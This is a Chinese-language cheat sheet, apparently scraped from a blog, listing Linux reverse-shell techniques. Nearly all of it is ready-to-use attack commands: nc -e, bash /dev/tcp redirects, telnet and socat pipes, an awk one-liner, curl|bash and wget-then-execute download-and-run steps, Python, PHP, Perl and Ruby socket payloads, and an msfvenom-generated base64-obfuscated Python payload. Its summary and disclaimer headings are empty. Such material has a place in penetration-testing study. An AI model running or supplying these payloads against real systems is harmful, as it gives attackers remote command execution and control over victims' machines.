概述
反弹方式
在不同的操作系统中,反弹shell的方式有所不同,这里就先总结Linux的反弹shell思路。
nc -l 9999
在不同的反弹shell方式中,都需要客户端监听,下文将不再赘述,仅讲述不同的反弹方式
nc
,前面的端口监听就是使用 Netcat# 目标主机中执行的反弹命令
nc Your_IP Your_Port -e /bin/bash
# payload1
bash -i >& /dev/tcp/Your_IP/Your_Port 0>&1
# payload2
bash -c "bash -i >& /dev/tcp/Your_IP/Your_Port 0>&1"
bash -c whoami
/dev/tcp/Your_IP/Your_Port
mknod a p; telnet Your_IP Your_Port 0<a | /bin/bash 1>a
nc -l Your_cmd_Port
nc -l Your_result_Port
telnet Your_IP Your_cmd_Port | /bin/bash | telnet Your_IP Your_result_Port
此外,在一些工控设备中,常常由 telnetd 程序,也可以利用其来开启正向的shell
目标主机开启监听
telnetd -p Your_Port -l /bin/sh
攻击主机正向连接
telnet Your_IP Your_Port
apt-get install socat
socat TCP-LISTEN:2333 -
socat tcp-connect:Your_IP:Your_Port exec:'bash -li',pty,stderr,setsid,sigint,sane
nc -l 9999
awk 'BEGIN{s="/inet/tcp/0/Your_IP/Your_Listening_Port";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
# 新建payload
cd /tmp
echo 'bash -c "bash -i >& /dev/tcp/Your_IP/Your_Port 0>&1"' > index.html
# 开启Web服务
python3 -m http.server 80
curl http://Your_IP|bash
TIPS:此处的IP可以是任意的可解析格式,如十进制、十六进制等等,可参考 SSRF 中的IP过滤绕过
wget http://Your_IP -O /tmp/1.sh &&chmod 777 /tmp/1.sh && /tmp/1.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Your_IP",Your_Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("Your_IP","Your_Port");exec("/bin/sh -i <&3 >&3 2>&3");'
perl -e 'use Socket;$i="Your_IP";$p=Your_Port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
ruby -rsocket -e 'c=TCPSocket.new("Your_IP","Your_Port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 1. 查询payload
msfvenom -l payloads | grep 'cmd/unix/reverse'
# 2. 生成反弹 shell 的 payload
msfvenom -p cmd/unix/reverse_python LHOST=Your_IP LPORT=Your_Port -f raw
# 3. 先开启监听,再将生成的payload在目标主机执行即可
Payload size: 517 bytes
python -c "exec('aW1wb3J0IHNvY2tldCwgICAgc3VicHJvY2VzcywgICAgb3MgICAgIDsgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4xIiAgICAgOyAgICAgICAgcG9ydD04MDAwICAgICA7ICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgIHMuY29ubmVjdCgoaG9zdCwgICAgcG9ydCkpICAgICA7ICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgIDApICAgICA7ICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgIDEpICAgICA7ICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgIDIpICAgICA7ICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
进行 Base64 解码后就会发现,生成的就是 Python中的 payload
总结
声明
参考链接https://masterxsec.github.io/2017/07/21/Linux%E5%8F%8D%E5%BC%B9shell%E7%9A%8410%E7%A7%8D%E5%A7%BF%E5%8A%BF/